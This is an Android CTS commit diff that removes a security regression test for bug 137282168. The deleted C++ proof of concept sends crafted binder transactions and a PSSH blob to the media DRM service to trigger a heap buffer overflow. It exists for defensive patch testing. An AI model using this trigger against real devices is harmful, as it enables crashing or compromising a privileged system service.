Revert "Add POC test from b/137282168 to CTS."
Test is obsolete in rvc as IDrm no longer derives from IBinder.
hidl version would be added to android.security.sts.PocQt_Qpr3.
This reverts commit a690a2e2b66307043eecd3f3d416f66a4afe7e58.
Bug: 137282168
Bug: 137370379
Bug: 143027314
Change-Id: I1e5a120c44804a521b4afdc6cca7aa1fa9e485a4
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index fe1e89c..2cc289a 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -43,7 +43,6 @@
<option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
<option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
<option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
- <option name="push" value="Bug-137282168->/data/local/tmp/Bug-137282168" />
<option name="push" value="Bug-137878930->/data/local/tmp/Bug-137878930" />
<!--__________________-->
diff --git a/hostsidetests/securitybulletin/securityPatch/Bug-137282168/Android.bp b/hostsidetests/securitybulletin/securityPatch/Bug-137282168/Android.bp
deleted file mode 100644
index e6fd1de..0000000
--- a/hostsidetests/securitybulletin/securityPatch/Bug-137282168/Android.bp
+++ /dev/null
@@ -1,30 +0,0 @@
-// Copyright (C) 2020 The Android Open Source Project
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-cc_test {
- name: "Bug-137282168",
- defaults: ["cts_hostsidetests_securitybulletin_defaults"],
- srcs: ["poc.cpp"],
- shared_libs: [
- "libbinder",
- "liblog",
- "libutils",
- ],
- cflags: [
- "-Wall",
- "-Werror",
- "-Wno-unused-parameter",
- "-Wno-unused-variable",
- ],
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/Bug-137282168/poc.cpp b/hostsidetests/securitybulletin/securityPatch/Bug-137282168/poc.cpp
deleted file mode 100644
index 0f27c1c..0000000
--- a/hostsidetests/securitybulletin/securityPatch/Bug-137282168/poc.cpp
+++ /dev/null
@@ -1,115 +0,0 @@
-/**
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#include <binder/IBinder.h>
-#include <binder/IServiceManager.h>
-#include <binder/Parcel.h>
-#include <utils/String16.h>
-#include <utils/String8.h>
-
-#include "../includes/common.h"
-
-using namespace android;
-
-static uint8_t pssh[28] = {
- 0, 0, 0, 28, // Total Size
- 'p', 's', 's', 'h', // PSSH
- 1, 0, 0, 0, // Version
- 0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02, // System ID
- 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b,
-};
-
-static Vector<uint8_t> sessionId;
-
-static sp<IBinder> drmBinder;
-
-static void handler(int) {
- ALOGI("Good, the test condition has been triggered");
- exit(EXIT_VULNERABLE);
-}
-
-static void readVector(Parcel &reply, Vector<uint8_t> &vector) {
- uint32_t size = reply.readInt32();
- vector.insertAt((size_t)0, size);
- reply.read(vector.editArray(), size);
-}
-
-static void writeVector(Parcel &data, Vector<uint8_t> const &vector) {
- data.writeInt32(vector.size());
- data.write(vector.array(), vector.size());
-}
-
-static void makeDrm() {
- sp<IServiceManager> sm = defaultServiceManager();
- sp<IBinder> mediaDrmBinder = sm->getService(String16("media.drm"));
-
- Parcel data, reply;
-
- data.writeInterfaceToken(String16("android.media.IMediaDrmService"));
- mediaDrmBinder->transact(2 /* MAKE_DRM */, data, &reply, 0);
-
- drmBinder = reply.readStrongBinder();
-}
-
-static void createPlugin() {
- Parcel data, reply;
-
- data.writeInterfaceToken(String16("android.drm.IDrm"));
- uint8_t uuid[16] = {0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
- 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b};
- data.write(uuid, 16);
- data.writeString8(String8("ele7enxxh"));
-
- drmBinder->transact(3 /* CREATE_PLUGIN */, data, &reply, 0);
-}
-
-static void openSession() {
- Parcel data, reply;
-
- data.writeInterfaceToken(String16("android.drm.IDrm"));
- data.writeInt32(1 /* SW_SECURE_CRYPTO */); // level
- drmBinder->transact(5 /* OPEN_SESSION */, data, &reply, 0);
- readVector(reply, sessionId);
-}
-
-static void getKeyRequest() {
- Parcel data, reply;
-
- data.writeInterfaceToken(String16("android.drm.IDrm"));
- Vector<uint8_t> initData;
- initData.appendArray(pssh, sizeof(pssh));
- writeVector(data, sessionId);
- writeVector(data, initData);
- data.writeString8(
- String8("video/mp4") /* kIsoBmffVideoMimeType */); // mimeType
- data.writeInt32(1 /* KeyType::STREAMING */); // keyType
- data.writeInt32(0); // count
-
- drmBinder->transact(7 /*GET_KEY_REQUEST*/, data, &reply);
-}
-
-int main(void) {
- signal(SIGABRT, handler);
-
- makeDrm();
-
- createPlugin();
-
- openSession();
-
- getKeyRequest();
-
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
index 3d729f6..8ce2804 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
@@ -26,16 +26,6 @@
@RunWith(DeviceJUnit4ClassRunner.class)
public class Poc19_07 extends SecurityTestCase {
/**
- * Bug-137282168
- */
- @Test
- @SecurityTest(minPatchLevel = "2019-07")
- public void testPocBug_137282168() throws Exception {
- assertFalse("Heap buffer overflow encountered",
- AdbUtils.runPocCheckExitCode("Bug-137282168", getDevice(), 300));
- }
-
- /**
* Bug-137878930
*/
@Test